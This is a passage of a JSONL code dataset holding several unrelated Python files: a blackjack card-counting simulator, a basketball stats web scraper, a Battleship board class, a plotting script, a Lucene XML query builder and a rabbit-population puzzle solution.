len(self.players[playernumber]) == 1:\r\n if score == 21 and len(self.players[playernumber][handnumber].deck_of_cards) == 2:\r\n score = 'Blackjack'\r\n return score\r\n\r\n def total_hand(self,playernumber,handnumber = 0):\r\n score = 0\r\n\r\n temp_hand_scores = []\r\n for card in self.players[playernumber][handnumber].deck_of_cards:\r\n \r\n rankname = card.rankname\r\n\r\n if rankname == 'Jack' or rankname == 'Queen' or rankname == 'King' :\r\n rank = 10\r\n elif rankname == 'Ace':\r\n rank = 11\r\n else:\r\n rank = card.rank\r\n\r\n temp_hand_scores.append(rank)\r\n\r\n self.hand_scores[playernumber][handnumber] = temp_hand_scores\r\n\r\n score = sum(self.hand_scores[playernumber][handnumber])\r\n while score > 21 and 11 in self.hand_scores[playernumber][handnumber]:\r\n newhand = self.ace_check(score,self.hand_scores[playernumber][handnumber])\r\n self.hand_scores[playernumber][handnumber] = newhand\r\n score = sum(self.hand_scores[playernumber][handnumber])\r\n \r\n if score == 17 and 11 in self.hand_scores[0][0] and playernumber == 0:\r\n self.soft17 = True\r\n\r\n if playernumber == 0 and score >21:\r\n score = 0\r\n\r\n elif playernumber > 0 and score > 21:\r\n score = -1\r\n\r\n return score\r\n\r\n def play_round(self,num_of_rounds = 1):\r\n #for k in range(num_of_rounds):\r\n self.one_shuffle = 0\r\n while self.one_shuffle == 0:\r\n if self.use_count_multiplier == True:\r\n if self.num_of_decks == 1:\r\n if self.true_count <= 1:\r\n self.count_multiplier = 1.0\r\n elif self.true_count == 2:\r\n self.count_multiplier = 2.0\r\n elif self.true_count == 3:\r\n self.count_multiplier = 3.0\r\n elif self.true_count >= 4:\r\n self.count_multiplier = 4.0\r\n\r\n elif self.num_of_decks == 2: \r\n if self.true_count <= 1:\r\n self.count_multiplier = 1.0\r\n elif self.true_count == 2:\r\n self.count_multiplier = 2.0\r\n elif self.true_count == 3:\r\n self.count_multiplier = 3.0\r\n elif self.true_count == 4:\r\n self.count_multiplier = 4.0\r\n elif self.true_count == 5:\r\n self.count_multiplier = 5.0\r\n elif self.true_count >= 6:\r\n self.count_multiplier = 6.0 \r\n elif self.num_of_decks >=3: \r\n if self.true_count <= 1:\r\n self.count_multiplier = 1.0\r\n elif self.true_count == 2:\r\n self.count_multiplier = 2.0\r\n elif self.true_count == 3:\r\n self.count_multiplier = 4.0\r\n elif self.true_count == 4:\r\n self.count_multiplier = 8.0\r\n elif self.true_count >= 5:\r\n self.count_multiplier = 12.0\r\n \r\n else:\r\n self.count_multiplier = 1.0\r\n\r\n total_high_cards = 0\r\n total_low_cards = 0\r\n for card in self.deck.deck_of_cards:\r\n if card.rank == 1 or card.rank >= 10:\r\n total_high_cards = total_high_cards+1\r\n if card.rank >= 2 and card.rank<= 6:\r\n total_low_cards = total_low_cards+1\r\n\r\n current_value = total_low_cards-total_high_cards\r\n self.expected_count = self.start_value-current_value\r\n \r\n temp = [0,0,0,0,0]\r\n temp[0] = self.count\r\n temp[1] = self.true_count\r\n temp[2] = self.count_multiplier\r\n temp[3] = self.expected_count\r\n temp[4] = len(self.deck.deck_of_cards)\r\n self.count_array.append(temp)\r\n\r\n \r\n if len(self.deck.deck_of_cards) < self.penetration_point:\r\n self.discardpile.deal_card(self.deck,len(self.discardpile.deck_of_cards))\r\n self.deck.shuffle(self.random_seed,False)\r\n self.count = 0\r\n self.true_count = 0\r\n self.reshuffle_total = self.reshuffle_total + 1\r\n max_count_all = np.max(self.count_array,axis = 0)\r\n max_count = max_count_all[1]\r\n self.max_count_array.append(max_count)\r\n mean_count_all = 
np.mean(self.count_array,axis = 0)\r\n                mean_count = mean_count_all[1]\r\n                self.mean_count_array.append(mean_count)\r\n                self.count_array = []\r\n                self.one_shuffle = 1\r\n                break\r\n            self.deal()\r\n\r\n            self.dealer_shows = self.players[0][0].deck_of_cards[1]\r\n            self.count_card(self.dealer_shows)\r\n\r\n            self.check_insurance(self.dealer_shows)\r\n\r\n            scoreDealer = self.total_hand(0,0)\r\n            score1 = self.total_hand(1,0)\r\n            scoreDealer = self.blackjack_check(scoreDealer,0,0)\r\n            score1 = self.blackjack_check(score1,1,0)\r\n            \r\n            splitblackpossible = False\r\n\r\n            # a blackjack after splitting is possible when the player holds a pair of tens or aces\r\n            if self.players[1][0].deck_of_cards[1] == self.players[1][0].deck_of_cards[0] \\\r\n            and (\r\n                self.players[1][0].deck_of_cards[1].rank == 10 \\\r\n                or self.players[1][0].deck_of_cards[1].rank == 1\r\n            ):\r\n                splitblackpossible = True\r\n            \r\n\r\n            skip = False\r\n            if scoreDealer == 'Blackjack' and splitblackpossible == False:\r\n                skip = True\r\n            if score1 == 'Blackjack':\r\n                skip = True\r\n\r\n            if skip == False:\r\n                self.variations(self.true_count,self.use_count)\r\n                ace_split = self.check_split(1)\r\n                for n in range(len(self.players[1])):\r\n                    score1 = self.total_hand(1,n)\r\n                    self.variations(self.true_count,self.use_count)\r\n                    strat1 = self.strategy(1,n,score1)\r\n                    if strat1 == 'Surrender' and ace_split == False:\r\n                        self.action(strat1,1,n)\r\n                        self.surrendered[1][n] = True\r\n\r\n                    while strat1 != 'Stand' and self.surrendered[1][n] == False and ace_split == False:\r\n                        if strat1 == 'Double':\r\n                            self.action(strat1,1,n)\r\n                            break\r\n                        self.action(strat1,1,n)\r\n                        score1 = self.total_hand(1,n)\r\n                        self.variations(self.true_count,self.use_count)\r\n                        strat1 = self.strategy(1,n,score1)\r\n\r\n                if self.soft17hit == False: \r\n                    while scoreDealer<17 and scoreDealer>0 and score1 != -1:\r\n                        self.count_card(self.deck.deal_card(self.players[0][0],1))\r\n                        scoreDealer = self.total_hand(0,0)\r\n\r\n                    if scoreDealer == 0:\r\n                        self.dealer_bust_count = self.dealer_bust_count + 1\r\n                elif self.soft17hit == True:\r\n                    while ((scoreDealer<17 and scoreDealer>0 and score1!=-1) or self.soft17 == True) and score1 != -1:\r\n                        if self.soft17 == True:\r\n                            self.soft17 = False\r\n                        self.count_card(self.deck.deal_card(self.players[0][0],1))\r\n                        scoreDealer = self.total_hand(0,0)\r\n\r\n                    if scoreDealer == 0:\r\n                        self.dealer_bust_count = self.dealer_bust_count + 1\r\n\r\n            for n in range(len(self.players[1])):\r\n                score1 = self.total_hand(1,n)\r\n                score1 = self.blackjack_check(score1,1,0)\r\n\r\n                if score1 == 'Blackjack' and scoreDealer != 'Blackjack':\r\n                    self.round_scores[1] = self.round_scores[1]+1\r\n                    self.winnings = self.winnings + 1.5*self.bet*self.count_multiplier\r\n                    self.blackjack_count = self.blackjack_count+1\r\n\r\n                elif score1 != 'Blackjack' and scoreDealer == 'Blackjack':\r\n                    self.round_scores[0] = self.round_scores[0]+1\r\n                    self.winnings = self.winnings - self.bet*self.count_multiplier*(1.0-self.Insurance)\r\n\r\n                elif score1 == 'Blackjack' and scoreDealer == 'Blackjack':\r\n                    #tie\r\n                    self.blackjack_count = self.blackjack_count+1\r\n\r\n                elif self.surrendered[1][n] == True:\r\n                    self.round_scores[0] = self.round_scores[0]+1\r\n                    self.winnings = self.winnings - self.bet*self.count_multiplier*0.5\r\n                    \r\n                elif scoreDealer>score1:\r\n                    self.round_scores[0] = self.round_scores[0]+1\r\n                    self.winnings = self.winnings - self.bet*(self.did_double[1][n] * 1.0 + 1.0)*self.count_multiplier\r\n                    \r\n                elif scoreDealer<score1:\r\n                    self.round_scores[1] = self.round_scores[1]+1\r\n                    self.winnings = self.winnings + self.bet*(self.did_double[1][n] * 1.0 + 1.0)*self.count_multiplier\r\n\r\n            # round over: move every hand to the discard pile, then collapse any split hands\r\n            for i in range(len(self.players)):\r\n                for n in range(len(self.players[i])):\r\n                    cards_to_discard = len(self.players[i][n].deck_of_cards)\r\n                    self.players[i][n].deal_card(self.discardpile,cards_to_discard)\r\n\r\n                while len(self.players[i]) > 1:\r\n                    self.players[i].pop()\r\n                    self.hand_scores[i].pop()\r\n                    self.did_double[i].pop()\r\n                    self.surrendered[i].pop()\r\n\r\n                self.did_double[i][0] = 
False\r\n self.surrendered[1][0] = False\r\n\r\n def strategy(self,playernumber,handnumber = 0,score = -1):\r\n deal_shows_rank = self.dealer_shows.rank\r\n if deal_shows_rank >= 10:\r\n deal_shows = 10\r\n else:\r\n deal_shows = deal_shows_rank\r\n\r\n strat = ''\r\n\r\n if len(self.players[playernumber][handnumber].deck_of_cards) == 2 and self.use_surrender_variable == True:\r\n strat = Blackjack.surrender_table[score][deal_shows]\r\n\r\n if strat == 'Surrender':\r\n stophere = True\r\n self.surrender_count = self.surrender_count+1\r\n\r\n elif len(self.players[playernumber][handnumber].deck_of_cards) == 2 \\\r\n and (self.players[playernumber][handnumber].deck_of_cards[0].rank == \\\r\n self.players[playernumber][handnumber].deck_of_cards[1].rank ) \\\r\n and (self.players[playernumber][handnumber].deck_of_cards[0].rank != 5):\r\n strat = self.bet_tables_pairs_var[self.players[playernumber][handnumber].deck_of_cards[0].rank][deal_shows] \r\n \r\n elif 11 in self.hand_scores[playernumber][handnumber]:\r\n no_ace_score = score - 11\r\n strat = Blackjack.bet_tables_ace[no_ace_score][deal_shows]\r\n\r\n elif score <= 17:\r\n strat = self.bet_tables_no_ace_var[score][deal_shows]\r\n \r\n else:\r\n strat = 'Stand'\r\n\r\n if strat == 'Double':\r\n if len(self.players[playernumber][handnumber].deck_of_cards) == 2:\r\n strat = 'Double'\r\n else:\r\n strat = self.bet_tables_no_ace_var[score][deal_shows]\r\n if strat == 'Double':\r\n strat = 'Hit'\r\n\r\n return strat\r\n\r\n def count_card(self, card):\r\n if card.rank <=6 and card.rank>= 2:\r\n self.count = self.count+1\r\n elif card.rank == 1 or card.rank>=10:\r\n self.count = self.count-1\r\n\r\n if self.num_of_decks > 2:\r\n cards_remaining = float(len(self.deck.deck_of_cards))\r\n decks_remaining = cards_remaining/52.0\r\n tr_count = float(self.count)/decks_remaining\r\n self.true_count = int(tr_count)\r\n\r\n elif self.num_of_decks > 0 and self.num_of_decks <= 2:\r\n self.true_count = self.count\r\n\r\n def action(self,move,playernumber,handnumber = 0):\r\n\r\n if move == 'Hit':\r\n self.count_card(self.deck.deal_card(self.players[playernumber][handnumber],1))\r\n \r\n elif move == 'Double':\r\n self.count_card(self.deck.deal_card(self.players[playernumber][handnumber],1))\r\n self.did_double[playernumber][handnumber] = True\r\n self.double_count = self.double_count+1\r\n\r\n elif move == 'Split':\r\n newhand = Hand('splithand')\r\n self.players[playernumber].append(newhand)\r\n self.players[playernumber][handnumber].deal_card(self.players[playernumber][-1],1)\r\n self.count_card(self.deck.deal_card(self.players[playernumber][handnumber],1))\r\n self.count_card(self.deck.deal_card(self.players[playernumber][-1],1))\r\n self.hand_scores[playernumber].append([])\r\n self.did_double[playernumber].append(False)\r\n self.surrendered[playernumber].append(False)\r\n self.split_count = self.split_count+1\r\n\r\n\r\n\r\n def check_split(self,playernumber):\r\n hand_strategies = []\r\n did_split = False\r\n for handnumber in range(len(self.players[playernumber])):\r\n score = self.total_hand(playernumber,handnumber)\r\n strat = self.strategy(playernumber,handnumber,score)\r\n hand_strategies.append(strat)\r\n\r\n if 'Split' in hand_strategies:\r\n for handnumber in range(len(self.players[playernumber])):\r\n score = self.total_hand(playernumber,handnumber)\r\n strat = self.strategy(playernumber,handnumber,score)\r\n if strat == 'Split':\r\n self.action('Split',playernumber,handnumber)\r\n\r\n self.check_split(playernumber)\r\n did_split =True\r\n if 
did_split == True and self.players[playernumber][0].deck_of_cards[0].rank == 1:\r\n ace_split = True\r\n return ace_split\r\n else:\r\n ace_split = False\r\n return ace_split\r\n\r\n def check_insurance(self,dealer_shows,playernumber = 1):\r\n deal_shows_rank = dealer_shows.rank\r\n\r\n if deal_shows_rank == 1 and self.true_count >= 3 and self.use_count == True:\r\n self.Insurance = True\r\n self.winnings = self.winnings - 0.3*self.bet\r\n self.insurance_count = self.insurance_count+1\r\n\r\n \r\n\r\n def use_surrender(self,use_surrender):\r\n if use_surrender == True:\r\n Blackjack.surrender_table[16][1] = 'Surrender'\r\n Blackjack.surrender_table[16][9] = 'Surrender'\r\n Blackjack.surrender_table[16][10] = 'Surrender'\r\n Blackjack.surrender_table[15][10] = 'Surrender'\r\n\r\n def variations(self,count,use):\r\n\r\n self.bet_tables_no_ace_var = np.copy(Blackjack.bet_tables_no_ace)\r\n self.bet_tables_pairs_var = np.copy(Blackjack.bet_tables_pairs)\r\n\r\n if use == True and self.num_of_decks>2:\r\n for i in range(count+1):\r\n if i == 8:\r\n donothing = True\r\n elif i == 7:\r\n donothing =True\r\n elif i == 6:\r\n donothing = True\r\n elif i == 5:\r\n self.bet_tables_pairs_var[10][5] = 'Split'\r\n self.bet_tables_pairs_var[10][6] = 'Split'\r\n self.bet_tables_no_ace_var[16][9] = 'Stand'\r\n elif i == 4:\r\n self.bet_tables_no_ace_var[15][10] = 'Stand'\r\n self.bet_tables_no_ace_var[10][10] = 'Double'\r\n if self.soft17hit == False:\r\n self.bet_tables_no_ace_var[10][1] = 'Double'\r\n self.bet_tables_no_ace_var[12][2] = 'Stand'\r\n self.bet_tables_no_ace_var[9][7] = 'Double'\r\n elif i == 3:\r\n if self.soft17hit == True:\r\n self.bet_tables_no_ace_var[10][1] = 'Double'\r\n elif i == 2:\r\n self.bet_tables_no_ace_var[12][3] = 'Stand' \r\n elif i == 1:\r\n if self.soft17hit == False:\r\n self.bet_tables_no_ace_var[11][1] = 'Double'\r\n self.bet_tables_no_ace_var[9][2] = 'Double'\r\n elif i == 0:\r\n self.bet_tables_no_ace_var[12][4] = 'Stand'\r\n self.bet_tables_no_ace_var[16][10] = 'Stand'\r\n \r\n if self.true_count >= -1:\r\n self.bet_tables_no_ace_var[13][2] = 'Stand'\r\n if self.soft17hit == False:\r\n self.bet_tables_no_ace_var[12][6] = 'Stand'\r\n if self.soft17hit == False:\r\n self.bet_tables_no_ace_var[11][1] = 'Double'\r\n self.bet_tables_no_ace_var[12][5] = 'Stand'\r\n if self.true_count >= -2: \r\n self.bet_tables_no_ace_var[13][3] = 'Stand'\r\n if self.count >= -3:\r\n if self.soft17hit == True:\r\n self.bet_tables_no_ace_var[12][6] = 'Stand'\r\n\r\n if use == True and self.use_surrender_variable == True:\r\n for i in range(count+2):\r\n if i == 4:\r\n Blackjack.surrender_table[14][10] = 'Surrender'\r\n if i == 3:\r\n Blackjack.surrender_table[15][9] = 'Surrender'\r\n if self.soft17hit == False:\r\n Blackjack.surrender_table[15][1] = 'Surrender'\r\n if i == 1:\r\n Blackjack.surrender_table[15][10] = 'Surrender'\r\n if i == 0 and self.soft17hit == True:\r\n Blackjack.surrender_table[15][1] = 'Surrender'\r\n\r\n def reset(self,reset_seed = False, random_seed=42):\r\n for i in range(len(self.players)):\r\n # print self.players[i]\r\n for n in range(len(self.players[i])):\r\n cards_to_discard = len(self.players[i][n].deck_of_cards)\r\n self.players[i][n].deal_card(self.discardpile,cards_to_discard)\r\n self.deck.shuffle(random_seed,reset_seed)\r\n \r\n while len(self.players[i]) > 1:\r\n self.players[i].pop()\r\n self.hand_scores[i].pop()\r\n self.did_double[i].pop()\r\n self.surrendered[i].pop()\r\n\r\n self.did_double[i][0] = False\r\n self.surrendered[1][0] = 
False\r\n\r\n\r\n        self.round_scores = [0,0]\r\n        self.count = 0\r\n        self.true_count = 0\r\n        self.winnings = 0.0\r\n        self.bet = 10.0\r\n        self.count_multiplier = 1\r\n        self.blackjack_count = 0\r\n        self.surrender_count = 0\r\n        self.double_count = 0\r\n        self.split_count = 0\r\n        self.insurance_count = 0\r\n        self.dealer_bust_count = 0\r\n        self.soft17 = False\r\n        self.count_array = []\r\n        self.reshuffle_total = 0\r\n        self.expected_count = 0\r\n        self.start_value = 0\r\n        self.max_count_array = []\r\n        self.mean_count_array = []\r\n        self.round_count = [0]\r\n\r\n","sub_path":"Card_Decks_Sp.py","file_name":"Card_Decks_Sp.py","file_ext":"py","file_size_in_byte":30381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"432868826","text":"from bs4 import BeautifulSoup as BS\r\nimport pandas\r\nimport requests\r\nimport json\r\n\r\nclass NewTeamCrawler:\r\n    def __init__(self):\r\n        self.result = []\r\n        self.data = {}\r\n        self.headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'}\r\n\r\n    # Fetch one team's roster and its stats for a given season\r\n    def GetData(self, url):\r\n        team_data = {\r\n            \"rosters\": {},\r\n            \"stats\": {}\r\n        }\r\n        # fetch the player roster\r\n        team_data[\"rosters\"] = pandas.read_html(url)[0].to_dict()\r\n        # fetch the team stats (the table is hidden inside an HTML comment)\r\n        html = requests.get(url, headers = self.headers).text\r\n        soup = BS(html, 'html.parser')\r\n        placeholders = soup.find_all('div', {'class': 'placeholder'})\r\n        table = None\r\n        for title in placeholders:\r\n            # get elements after placeholder and join in one string\r\n            comment = ''.join(title.next_siblings)\r\n            # parse comment\r\n            soup_comment = BS(comment, 'html.parser')\r\n            if soup_comment.find(id='team_and_opponent') is not None:\r\n                table = soup_comment.find(id='team_and_opponent')\r\n                data = pandas.read_html(str(table))[0]\r\n                team_data[\"stats\"] = data.to_dict()\r\n                break\r\n        if table is None:\r\n            team_data[\"stats\"] = None\r\n        return team_data\r\n\r\n    # Visit every requested team and every season, appending the results to the list\r\n    def process(self, index_start, index_final):\r\n        i = 0\r\n        for key, value in self.data.items():\r\n            # stop once we are past the last requested team; this must be\r\n            # checked first, otherwise the branch below always wins\r\n            if i > int(index_final):\r\n                break\r\n            if i >= int(index_start):\r\n                print(\"取得\" + key + \"資料中...\")\r\n                entry = {}\r\n                entry[\"name\"] = key\r\n                for inner_key, inner_value in value.items():\r\n                    entry[inner_key] = self.GetData(inner_value)\r\n                    print(key + inner_key + \"完成!\")\r\n                self.result.append(entry)\r\n                print(key + \" Done!\")\r\n            i += 1\r\n\r\n    # Fetch the per-season links for a single team\r\n    def GetEachYears(self, domain, url):\r\n        temp = {}\r\n        res = requests.get(url, headers = self.headers).text\r\n        res = BS(res, 'lxml')\r\n        links = res.select(\"tbody tr th a\") # links to the individual seasons\r\n        i = 0\r\n        for link in links:\r\n            temp[link.text] = domain + link.get('href')\r\n            i += 1\r\n            if i == 11: # take 11 seasons in total\r\n                break\r\n        return temp\r\n\r\n    # Fetch the link for every team\r\n    def GetTeamList(self):\r\n        domain = \"https://www.basketball-reference.com\"\r\n        res = requests.get(\"https://www.basketball-reference.com/teams/\").text\r\n        res = BS(res, 'lxml')\r\n        table = res.select('table')[0]\r\n        links = table.select('a')\r\n        for link in links:\r\n            self.data[link.text] = self.GetEachYears(domain, domain + link.get('href'))\r\n            print(link.text + \"取得各年連結!\")\r\n\r\n    def openFile(self):\r\n        fileName = './JSON/team_link.json'\r\n        with open(fileName, 'r') as loadFile:\r\n            self.data = json.load(loadFile)\r\n\r\n    # Finally, write the collected results out as JSON\r\n    def save_to_json(self, name, data):\r\n        file_name = \"./JSON/\" + name + \".json\"\r\n        with open(file_name, 'w') as file_object:\r\n            json.dump(data, file_object)\r\n            
print(file_name + \"完成!!!\")\r\n\r\nif __name__ == '__main__':\r\n crawler = NewTeamCrawler()\r\n index_start = input(\"請輸入想從第幾支球隊開始爬取,0~29:\")\r\n index_final = input(\"請輸入想爬取到第幾支球隊,0~29:\")\r\n file_name = input(\"請輸入輸出檔案名稱:\")\r\n #crawler.GetTeamList()\r\n #crawler.save_to_json(\"team_link\", crawler.data)\r\n crawler.openFile()\r\n crawler.process(index_start, index_final)\r\n crawler.save_to_json(file_name, crawler.result)\r\n","sub_path":"python/Crawler/teamCrawler.py","file_name":"teamCrawler.py","file_ext":"py","file_size_in_byte":3933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"10849085","text":"import globvars as g\n\n\nclass Board:\n def __init__(self):\n self.board = [{'fill': 'O', 'ship': None} for _ in range(100)]\n\n # Place the ship in board and also to the player's fleet list\n # for tracking the ship name\n # Validates the ship placement and returns the coordinates\n def place_ship(self, start, step, size, name):\n coordinates = []\n new_fill = g.HORIZONTAL_SHIP\n\n if step == 10:\n new_fill = g.VERTICAL_SHIP\n if start + step * size < 100:\n coordinates = [i*step+start for i in range(size)]\n else:\n return(\n 0,\n \", your {} needs at least {} spaces to fit!\\n\"\n \"Choose another location.\"\n )\n\n elif (10 - (start % 10)) >= size:\n coordinates = [i*(step)+start for i in range(size)]\n else:\n return(\n 0,\n \", your {} needs at least {} spaces to fit!\\n\"\n \"Choose another location.\"\n )\n\n for c in coordinates:\n if self.board[c]['fill'] != g.EMPTY:\n return(\n 0,\n \", your {} is in the way!\".format(self.board[c]['ship'])\n )\n\n for c in coordinates:\n self.board[c]['fill'] = new_fill\n self.board[c]['ship'] = name\n self.print_board()\n\n return(\n coordinates,\n \", your {} has been deployed!\"\n )\n\n def print_board_heading(self):\n print(\"\\n\"+\"_\" * 40+\"\\n\")\n columns = [chr(c) for c in range(ord('A'), ord('A') + g.BOARD_SIZE)]\n print(\" \"*11 + \" \".join(columns))\n\n def print_board(self):\n self.print_board_heading()\n\n row_num = 0\n while row_num <= 90:\n print(\n \" \"*8 +\n str(int(row_num/10) + 1).rjust(2) + \" \" + (\" \".join([\n self.board[i]['fill'] for i in range(row_num, row_num+10)\n ]\n )\n )\n )\n row_num += 10\n print(\"_\" * 40)\n","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"499890160","text":"'''\r\nCreated on 2017\r\n\r\n@author: Frankee\r\n'''\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom matplotlib.ticker import MultipleLocator\r\n \r\ndef sgn(value):\r\n if value < 5:\r\n return 11.5 \r\n if value > 5 and value <= 14:\r\n return 13\r\n elif value > 14:\r\n return 15\r\n \r\ndef sgn1(value):\r\n if value < 2:\r\n return 10.2 \r\n if value > 2 and value <= 6:\r\n return 10.6\r\n elif value > 6 and value <= 9:\r\n return 12.2\r\n elif value > 9 and value <= 15:\r\n return 13.2\r\n elif value > 15:\r\n return 14.6\r\n\r\nplt.figure(figsize=(6,4)) \r\nx = np.linspace(0, 20, 100) \r\ny = np.array([]) \r\ny1 = np.array([]) \r\nfor a in x: \r\n y = np.append(y,np.linspace(sgn(a),sgn(a),1)) \r\n y1 = np.append(y1,np.linspace(sgn1(a),sgn1(a),1))\r\nl=plt.plot(x,y,'b',label='Optimal') \r\nl1=plt.plot(x,y1,'r',label='CherryPick') \r\n\r\nax = plt.gca()\r\nax.spines['right'].set_color('none') \r\nax.spines['top'].set_color('none') \r\n# ax.spines['bottom'].set_position(('data', 9)) \r\n# 
ax.spines['left'].set_position(('data',3)) \r\nxLocator = MultipleLocator(5)\r\nyLocator = MultipleLocator(0.5)\r\nax.set_xlim(0,20) \r\nax.set_ylim(10,16)\r\nax.xaxis.set_major_locator(xLocator)\r\nax.yaxis.set_major_locator(yLocator)\r\n\r\nax.set_xlabel('Generation')\r\nax.set_ylabel('Optimum')\r\nax.xaxis.set_ticks_position('bottom') \r\nax.yaxis.set_ticks_position('left') \r\n\r\nplt.legend()\r\n\r\nplt.show()","sub_path":"graph/src/Experiment2.py","file_name":"Experiment2.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"504339051","text":"### -*- coding: utf-8 -*- #############################################\n# Разработано компанией Ключевые Решения (http://keysolutions.ru/) \n# Все права защищены, 2006-2007 \n#\n# Developed by Key Solutions (http://keysolutions.ru/) \n# All right reserved, 2006-2007 \n#######################################################################\n# Licensed under the Zope Public License, Version 2.1 (the \"License\"); you\n# may not use this file except in compliance with the License. A copy of the\n# License should accompany this distribution.\n#\n# This software distributed under the License is distributed on an \"AS IS\"\n# BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n#######################################################################\n\"\"\"nuxeo.lucene.xmlquery for the Zope 3 package\n\n$Id$\n\"\"\"\n__author__ = \"Anatoly Bubenkov\"\n__license__\t= \"ZPL\"\n__version__ = \"$Revision$\"\n__date__ = \"$Date$\"\n__based_on__ = \"nuxeo.lucene.catalog http://www.nuxeo.org\"\n\nfrom nuxeo.lucene.xmlquery import XMLQuery, \\\n XMLSearchQuery, \\\n NXLuceneElement, \\\n logger, \\\n stringify\nfrom datetime import datetime\nimport base64\nfrom keydate import getStringFromDateTime, \\\n getDateTimeFromString\n \nRANGE_QUERY_FORMAT = \"[%s TO %s]\"\nimport cElementTree as etree\nimport sys\n\nclass KeyXMLQuery(XMLQuery):\n\n def __init__(self, objectAttributes, fieldconfs=()):\n\n self._doc = NXLuceneElement('doc')\n fields = NXLuceneElement('fields')\n for fieldconf in fieldconfs:\n\n ret = objectAttributes[fieldconf.attribute]\n\n if isinstance(ret, datetime):\n ret = getStringFromDateTime(ret)\n\n field = NXLuceneElement('field')\n\n field.attrib['id'] = fieldconf.name\n field.attrib['attribute'] = fieldconf.attribute\n field.attrib['type'] = fieldconf.type\n field.attrib['analyzer'] = fieldconf.analyzer\n\n value = ''\n if isinstance(ret, (list, tuple)):\n if fieldconf.type == 'Path':\n value = '/'.join(ret)\n else:\n value = '#'.join(stringify(v) for v in ret)\n else:\n value = ret\n\n # take care of int values\n if not isinstance(value, basestring):\n value = str(value)\n else:\n try:\n # decode from unicode, encode in utf-8\n value = value.encode('utf-8')\n except UnicodeDecodeError:\n # BBB\n value = str(value)\n # Base64 encoding.\n field.text = base64.b64encode(value)\n\n fields.append(field)\n self._doc.append(fields)\n \nclass KeyXMLSearchQuery(XMLSearchQuery):\n\n def __init__(self, return_fields=(), fieldconfs=(), options={}):\n\n self._doc = NXLuceneElement('search')\n\n # XXX make this configurable.\n ianalyzer = NXLuceneElement('analyzer')\n ianalyzer.text = 'standard'\n self._doc.append(ianalyzer)\n\n # Return fields\n ireturn_fields = NXLuceneElement('return_fields')\n for return_field in return_fields:\n ifield = NXLuceneElement('field')\n ifield.text = return_field\n 
ireturn_fields.append(ifield)\n self._doc.append(ireturn_fields)\n\n # fields\n ifields = NXLuceneElement('fields')\n for fieldconf in fieldconfs:\n\n k = fieldconf['id']\n v = fieldconf['value']\n t = fieldconf['type']\n c = fieldconf['condition']\n a = fieldconf['analyzer']\n u = fieldconf.get('usage', '')\n\n ifield = NXLuceneElement('field')\n\n ifield.attrib['id'] = k\n ifield.attrib['type'] = t\n ifield.attrib['condition'] = c\n ifield.attrib['analyzer'] = a\n ifield.attrib['usage'] = u\n\n if k + '_usage' in options.keys():\n # Get usage ZCatalog way for range query.\n # We strictly don't care about the ZCatalog\n # deprecation since it's quite handly in here.\n u = options.get(k+'_usage')\n ifield.attrib['usage'] = u\n\n # XXX change this. Hardcoded for now. Use a tokenizer\n # server side.\n if isinstance(v, str) or isinstance(v, unicode):\n ifield.attrib['value'] = v\n elif isinstance(v, list) or isinstance(v, tuple):\n if len(v) == 2:\n if v[0] is None and v[1] is None:\n continue\n elif isinstance(v[0], datetime) \\\n or isinstance(v[1], datetime):\n if v[0] is None:\n v = (datetime.min, v[1])\n elif v[1] is None:\n v = (v[0], datetime.max)\n v = tuple([getStringFromDateTime(i) for i in v])\n ifield.attrib['value'] = '#'.join(v)\n else:\n ifield.attrib['value'] = str(v)\n ifields.append(ifield)\n\n self._doc.append(ifields)\n\n # Batching start\n elt = NXLuceneElement('batch')\n\n b_start = options.get('b_start', 0)\n b_size = options.get('b_size', sys.maxint)\n\n elt.attrib['start'] = str(b_start)\n elt.attrib['size'] = str(b_size)\n \n self._doc.append(elt)\n\n # Operator\n op = options.get('operator')\n if op is not None:\n elt = NXLuceneElement('operator')\n elt.text = op\n self._doc.append(elt)\n\n # Sort\n elt = NXLuceneElement('sort')\n\n sort_on = options.get('sort-on')\n if sort_on is not None:\n subelt = NXLuceneElement('sort-on')\n subelt.text = sort_on\n elt.append(subelt)\n\n sort_limit = options.get('sort-limit')\n if sort_limit is not None:\n subelt = NXLuceneElement('sort-limit')\n subelt.text = str(sort_limit)\n elt.append(subelt)\n\n sort_order= options.get('sort-order')\n if sort_order is not None:\n subelt = NXLuceneElement('sort-order')\n subelt.text = str(sort_order)\n elt.append(subelt)\n\n self._doc.append(elt)\n\n def getStream(self):\n return etree.tostring(self._doc, encoding=\"UTF-8\")","sub_path":"keyindex/trunk/pyluceneindex/keyxmlquery.py","file_name":"keyxmlquery.py","file_ext":"py","file_size_in_byte":6770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"326238430","text":"# Given: Positive integers n≤100 and m≤20.\n# Return: The total number of pairs of rabbits that will remain after the n-th month if all rabbits live for m months.\n\nn = int(input(\"Number of months: \"))\nm = int(input(\"Life expectancy (in months): \"))\nimmature = 1\nbreeding = 0\npop = [[0,1]]\nfor x in range(1,n):\n temp = immature\n immature = breeding\n if x > m-1:\n breeding = (breeding) + temp - pop[x-m][1]\n else:\n breeding = breeding + temp\n pop.append([breeding, immature])\nprint(pop[n-1][0]+pop[n-1][1])\n","sub_path":"11-FIBD.py","file_name":"11-FIBD.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"376059506","text":"#this script is dedicated to the public domain under CC0 (https://creativecommons.org/publicdomain/zero/1.0/)\n#do whatever you want with it! 
